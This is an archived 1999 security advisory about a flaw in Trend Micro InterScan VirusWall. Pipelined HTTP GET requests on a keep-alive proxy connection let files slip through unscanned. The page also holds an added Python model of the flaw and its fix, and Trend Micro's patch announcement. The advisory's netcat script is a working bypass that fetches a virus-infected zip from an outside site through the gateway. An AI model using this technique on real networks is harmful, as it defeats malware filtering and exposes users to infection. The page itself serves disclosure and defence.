interscan.viruswall.txt

Posted Aug 17, 1999
Authored by s10, unicorn

Trend Micro's InterScan VirusWall does not properly protect LANs from inbound traffic: any user can download binaries and virus-infected files through the VirusWall by pipelining two HTTP GET requests on one keep-alive proxy connection. Exploit code included, followed by Trend Micro's BugTraq reply announcing a patch for the Solaris and HP-UX versions.

tags | exploit, virus
SHA-256 | c9dcc0e2e23227f93b25f0b63b208c428d5edecca2b432f333a2602c512d20ec

Date: Mon, 22 Feb 1999 21:31:51 +0100
From: The Unicorn <unicorn@BLACKHATS.ORG>
To: BUGTRAQ@netspace.org
Subject: BlackHats Advisory -- InterScan VirusWall

BlackHats Security Advisory


Release date: February 22, 1999
Application: InterScan Viruswall for Solaris
Severity: Any user can download binaries and virus-infected files through the VirusWall

Author(s): s10@blackhats.org, unicorn@blackhats.org

---
Overview :
---

InterScan VirusWall is part of Trend Micro's integrated family
of virus protection products that covers every access point - Internet
gateways, groupware, e-mail and intranet servers, LAN servers, and
desktops. InterScan VirusWall scans inbound and outbound SMTP mail and
attachments, FTP and HTTP traffic in real time. It automatically cleans
infected files and detects malicious Java applets and ActiveX objects.

When two HTML GET commands are combined in one request, of which
the former points to a non-scanned file like a graphic image (i.e. a GIF
file) and the latter to a possibly infected binary or macro file, both
of the files are passed to the user requesting the data without any
warning or logging by the VirusWall. We found that this combination
was sometimes generated by well-known web browsers like Netscape
Communicator and Microsoft Internet Explorer during normal use.

We informed Trend Micro of this vulnerability more than three
weeks ago. We fully described the problem to Trend Engineering and
included an exploit similar to the one described below and all traffic
between the browser and VirusWall, but did not receive a fix for this
problem. The explanation received was that they were unable to reproduce
it on their systems. Since these systems are used to protect people
behind (expensive) firewall configurations against virus infection, we
decided to make, at least, the administrators of these systems aware of
this exploit that can be used by users behind an InterScan VirusWall
configuration to circumvent the implemented security policy.

---
Affected systems:
---

InterScan Viruswall for Solaris
Implementations of InterScan VirusWall on other platforms are
likely to be vulnerable, but are not tested since we do not have
them available

---
Workarounds/Fixes:
---

We have not yet received a fix from Trend Micro. It might be
possible to close this hole by scanning *ALL* data passed in HTTP
traffic, but this will have a negative influence on the throughput of
the complete firewall configuration.

---
Example:
---

We developed the following exploit that requests two files in
one message. The first one is a simple graphic file (in this case from
the Trend Micro web-site) and the second one is a file containing a well
known macro-virus, which would normally be detected and removed by the
product. Using the netcat tool we send this combined request out to the
world using the VirusWall as a proxy-server. The information received
back is stored in a file. When later examining the file we find both the
graphic and the virus infected contents requested. Looking through the
logfiles no trace is found of this file seeping through the hole.

#!/bin/sh
# Two pipelined GET requests on one keep-alive proxy connection: the
# first fetches a GIF (not scanned by the VirusWall), the second the
# virus-infected archive. Both responses land in the.results.
echo "GET http://www.antivirus.com/vinfo/images/amb1.gif HTTP/1.0
Referer: http://www.antivirus.com/index.html
Proxy-Connection: Keep-Alive
User-Agent: Mozilla/4.5 [en] (WinNT; I)
Host: www.antivirus.com
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png
Accept-Encoding: gzip
Accept-Language: en
Accept-Charset: iso-8859-1,*,utf-8

GET http://sourceofkaos.com/homes/knowdeth/virii/boom-a.zip HTTP/1.0
Referer: http://sourceofkaos.com/homes/knowdeth/index.html
Proxy-Connection: Keep-Alive
User-Agent: Mozilla/4.5 [en] (WinNT; I)
Host: sourceofkaos.com
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */*
Accept-Encoding: gzip
Accept-Language: en
Accept-Charset: iso-8859-1,*,utf-8

" | nc viruswall 80 > the.results

Changing the second part of this "code" will enable downloading
any information through the Trend Micro InterScan VirusWall, probably
because the product only acts on the first GET command in a message
while retrieving all information requested.

---
Further Study:
---

Further study of this vulnerability may focus on FTP and SMTP
traffic and the detection of malicious Java applets and ActiveX objects.


Ciao,
Unicorn.
--
======= _ __,;;;/ TimeWaster ================================================
,;( )_, )~\| A Truly Wise Man Never Plays
;; // `--; Leapfrog With A Unicorn...
==='= ;\ = | ==== Youth is Not a Time in Life, It is a State of Mind! =======
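
The mechanism the advisory hypothesises, modelled as an added example (this is not code from the original post, from the authors, or from Trend Micro): a small Python parser that splits a raw client-to-proxy buffer into every pipelined request it carries, beside two gateway policies, one that classifies only the first request and relays the rest uninspected, and one that classifies each request on its own. The sample buffer, the image-suffix "no scan" list, and the policy functions are constructed for this illustration and are not InterScan's actual logic; the two URLs are the ones from the advisory's exploit.

```python
"""Pipelined-GET bypass model (added example, not the advisory's code)."""
from __future__ import annotations

import re
from dataclasses import dataclass, field
from urllib.parse import urlsplit

# Constructed policy: these suffixes are "not scanned", mirroring the
# advisory's observation that a GIF passed without inspection.
UNSCANNED_SUFFIXES = (".gif", ".jpg", ".jpeg", ".png")

# URLs taken from the advisory's exploit; used only to build the sample buffer.
GIF_URL = "http://www.antivirus.com/vinfo/images/amb1.gif"
ZIP_URL = "http://sourceofkaos.com/homes/knowdeth/virii/boom-a.zip"

# Constructed client->proxy buffer: two GETs pipelined on one connection.
SAMPLE_BUFFER = (
    f"GET {GIF_URL} HTTP/1.0\r\n"
    "Host: www.antivirus.com\r\n"
    "Proxy-Connection: Keep-Alive\r\n"
    "\r\n"
    f"GET {ZIP_URL} HTTP/1.0\r\n"
    "Host: sourceofkaos.com\r\n"
    "Proxy-Connection: Keep-Alive\r\n"
    "\r\n"
).encode("iso-8859-1")


@dataclass
class Request:
    method: str
    url: str
    version: str
    headers: dict[str, str] = field(default_factory=dict)


_BLANK_LINE = re.compile(rb"\r?\n\r?\n")


def parse_pipelined_requests(buf: bytes) -> list[Request]:
    """Split a raw client->proxy buffer into every request it carries.

    Body-less requests (GET) end at the first blank line, so the buffer is
    cut there; folded header continuations (leading SP/HT) are re-joined.
    Requests with Content-Length bodies are out of scope for this model.
    """
    requests: list[Request] = []
    for chunk in _BLANK_LINE.split(buf):
        lines = [ln.rstrip(b"\r") for ln in chunk.split(b"\n") if ln.strip()]
        if not lines:
            continue
        parts = lines[0].decode("iso-8859-1").split()
        if len(parts) != 3:
            raise ValueError(f"malformed request line: {lines[0]!r}")
        method, url, version = parts
        headers: dict[str, str] = {}
        last: str | None = None
        for raw in lines[1:]:
            line = raw.decode("iso-8859-1")
            if line[0] in " \t" and last is not None:
                headers[last] += " " + line.strip()  # obs-fold continuation
                continue
            name, sep, value = line.partition(":")
            if not sep:
                raise ValueError(f"malformed header line: {line!r}")
            last = name.strip().lower()
            headers[last] = value.strip()
        requests.append(Request(method, url, version, headers))
    return requests


def needs_scan(req: Request) -> bool:
    """Constructed gateway policy: image files pass, anything else is scanned."""
    return not urlsplit(req.url).path.lower().endswith(UNSCANNED_SUFFIXES)


def first_request_only(buf: bytes) -> list[tuple[str, bool]]:
    """Model of the behaviour the advisory hypothesises: only the first GET
    on the connection is classified; later requests are relayed unscanned."""
    reqs = parse_pipelined_requests(buf)
    if not reqs:
        return []
    return [(reqs[0].url, needs_scan(reqs[0]))] + [(r.url, False) for r in reqs[1:]]


def per_request(buf: bytes) -> list[tuple[str, bool]]:
    """Corrected behaviour: every pipelined request is classified on its own."""
    return [(r.url, needs_scan(r)) for r in parse_pipelined_requests(buf)]


def bypassed_urls(buf: bytes) -> list[str]:
    """URLs the first-request-only gateway relays unscanned although the
    policy says they must be scanned: the advisory's hole, per buffer."""
    return [
        url
        for (url, should), (_, did) in zip(per_request(buf), first_request_only(buf))
        if should and not did
    ]


if __name__ == "__main__":
    print("first-request-only:", first_request_only(SAMPLE_BUFFER))
    print("per-request:       ", per_request(SAMPLE_BUFFER))
    print("bypassed:          ", bypassed_urls(SAMPLE_BUFFER))
```

Run stand-alone it prints the two verdict lists and the single bypassed URL. Swapping the order of the two requests in the buffer makes the bypass disappear under this model, which matches the advisory's arrangement of an unscanned image first and the archive second; the parser also accepts the LF-only line endings the netcat script sends.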

----------------------------------------------------------------------------------

Date: Thu, 25 Feb 1999 12:28:46 -0800
From: Bob Li <Bob_Li@TRENDMICRO.COM>
To: BUGTRAQ@netspace.org
Subject: Patch for InterScan VirusWall for Unix now available

We have been recently notified about a potential security hole in our
InterScan Web VirusWall for Solaris product via the "BlackHats Security
Advisory". The potential problem described relates to being able to
download binaries and virus infected files by using HTTP proxy "keep-alive"
connections.

We have looked into the description of the problem and have identified that
there was a problem with the software. As a result, we are issuing a patch
which can be obtained from Trend Micro at http://www.antivirus.com to resolve
the problem.

This issue applies to InterScan for Solaris and HP-UX. The Windows NT
version of InterScan does not have this problem.

Bob Li
Product Manager
Trend Micro, Inc.
E-Mail: bob_li@trendmicro.com
Phone: 408-863-6341

© 2022 Packet Storm. All rights reserved.
